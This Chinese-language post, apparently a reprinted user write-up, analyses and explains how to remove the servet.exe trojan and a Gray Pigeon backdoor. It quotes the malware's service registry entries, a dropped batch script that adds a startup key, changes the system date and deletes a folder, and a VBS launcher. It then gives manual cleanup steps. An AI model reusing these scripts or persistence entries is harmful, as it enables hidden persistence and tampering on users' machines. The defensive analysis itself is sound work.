鸿 网 互 联 www.68idc.cn

清除servet.exe推荐

来源:互联网 作者:佚名 时间:2018-02-10 16:35
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown] "Type"=dword:00000110 "Start"=dword:00000002 "ErrorControl"=dword:00000000 "ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\ 79,00,73,00,74,00
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,72,00,76,00,65,\
  00,74,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="Windows InstallService"
"ObjectName"="LocalSystem"
"Description"="Windows InstallService" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
  05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
  20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
  00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
  00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
  00,01,01,00,00,00,00,00,05,12,00,00,00   随后利用Svchost反弹连接,下载2个木马:   %Systemroot%\system\11.exe  652604 字节 ,黑防的鸽子``   %Systemroot%\system32\11.exe  719834 字节 VB小毒,MS运行不起来``` - -   那个VB病毒,释放:   %Systemroot%\system32\11.bat  568 字节     reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v lype /t REG_EXPAND_SZ /d "%systemroot%\avp.exe" /f
set date=%date%
date 2000-01-01
@echo off setlocal enableextensions
echo WScript.Sleep 1000 %system%.\run$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %system%.\ run$.vbs
goto Timeout
goto End
:Next
%systemroot%\system\11.exe
copy %systemroot%\system\run.pif  %systemroot%\system32\
for %%f in (%system%.\run$.vbs*) do del %%f
date %date%
RD /S /Q %systemroot%\system\   %Systemroot%\system\11.vbs  137 字节     DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C  %systemroot%\system\11.bat", 0, TRUE)   其实就是一丘之貉``不过并未见释放avp.exe、 run$.vbs和写启动项```   但确实改了日期,修改为2000-01-01(注意,直接挂卡吧)``   还有那个652604 字节的灰鸽子,汗,还要我自己手工运行```(崩溃啊``)   黑防的灰鸽子,蛮不错的,加了免杀,过Visrutotal的Dr、BD、AVG、Ewdio、麦咖啡、NOD32等等``   注册为系统服务:   [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,73,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="smss"
"ObjectName"="LocalSystem"
"Description"="系统关键进程" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
  05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
  20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
  00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
  00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
  00,01,01,00,00,00,00,00,05,12,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Enum]
"0"="Root\\LEGACY_SMSS\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001   并使用Hook技术,实现进程隐藏``,哈哈``SSM可不会“坐视不理”:
图片点击可在新窗口打开查看
  随后反弹连接(穿防火墙),SSM拦下了,我放行```   等了一会,没什么举动```实在没耐性(最近很烦躁),删除了``   清除方法:   [url]http://gudugengkekao.ys168.com/[/url]   下载冰刃和SREng   图片点击可在新窗口打开查看SREng.rar 597KB   图片点击可在新窗口打开查看冰刃(增强版).rar 555KB   关闭不必要的进程,断开网络```   1、打开冰刃,看到IE和CMD的进程关掉,还有system.exe(C:\Windows\下的),就是那个灰鸽子``因为是Hook隐藏,所以IS会以红色显示,也把他关闭咯``   2、使用冰刃“文件”功能,删除:   C:\Windows\system\11.exe C:\Windows\system32\11.exe C:\Windows\system\11.bat C:\Windows\system\11.vbs C:\Windows\system32\servet.exe C:\Windows\systems.exe   3、打开SREng,删除:     [Windows InstallService / WindowsDown][Stopped/Auto Start]
  C:\winnt\system32\servet.exe N/A   [smss / smss][Running/Auto Start]
  C:\winnt\systems.exe N/A   OK,然后修改QQ、Mail等密码,重启``完事```   一些PP``:
网友评论
<